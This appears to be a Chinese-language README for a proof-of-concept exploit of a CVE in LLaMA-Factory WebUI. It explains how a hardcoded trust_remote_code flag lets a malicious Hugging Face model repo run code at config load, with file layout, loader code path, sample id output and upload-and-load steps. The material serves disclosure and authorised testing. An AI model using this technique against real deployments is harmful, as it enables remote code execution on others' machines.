
CVE-2026-58116 的概念验证漏洞利用,演示了通过 trust_remote_code 模型路径注入在 LLaMA-Factory WebUI 中实现远程代码执行。包含载荷模型和验证脚本,用于授权安全测试。
trust_remote_code 实现远程代码执行(RCE)CVE-2026-58116(CVSS 9.8 严重)的概念验证:远程代码执行
发生在 LLaMA-Factory <= v0.9.5 中。
LLaMA-Factory WebUI 在加载模型时将 trust_remote_code=True 硬编码
(src/llamafactory/webui/chatter.py:139 和 runner.py:175,320)。
攻击者可控的“模型路径”字段未经验证便流入
AutoTokenizer.from_pretrained() / AutoModel.from_pretrained(),因此
Hugging Face transformers 库会从恶意模型仓库下载并
执行任意 Python 代码。
本 PoC 仅用于授权的安全测试和教育。其中包含的
payload 故意保持无害(它通过 id 打印主机侦察信息)。仅可
对您拥有或经授权测试的系统运行。未经明确许可,切勿
对基础设施部署恶意 payload。
.
├── poc-model/
│ ├── config.json # declares auto_map → attacker modules
│ ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│ ├── modeling_poc.py # minimal stub model class
│ └── __init__.py # makes it an importable package
└── build_and_verify.py # assemble + verify the sink in isolation
transformers 会在加载任何权重之前实例化配置类,因此
PoCConfig.__init__ 中的 payload 在配置被读取时就会触发——无需
存在任何权重。这正是 LLaMA-Factory 通过
src/llamafactory/model/loader.py 所经过的路径:
def _get_init_kwargs(model_args):
return {"trust_remote_code": model_args.trust_remote_code, ...} # True (hardcoded)
def load_tokenizer(model_args):
init_kwargs = _get_init_kwargs(model_args)
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)
在本地验证 sink(无需 WebUI——证明 WebUI 所违反的约定):
pip install transformers torch
python3 build_and_verify.py
预期输出——请注意,payload 横幅在配置加载期间出现:
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
time : 2026-07-02T...
host : gpu-host-01
user : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)
通过正在运行的 LLaMA-Factory WebUI 进行端到端验证:
huggingface-cli login
python3 build_and_verify.py --upload your-user/llmfcty-poc
llamafactory-cli webuiyour-user/llmfcty-poc,点击加载模型。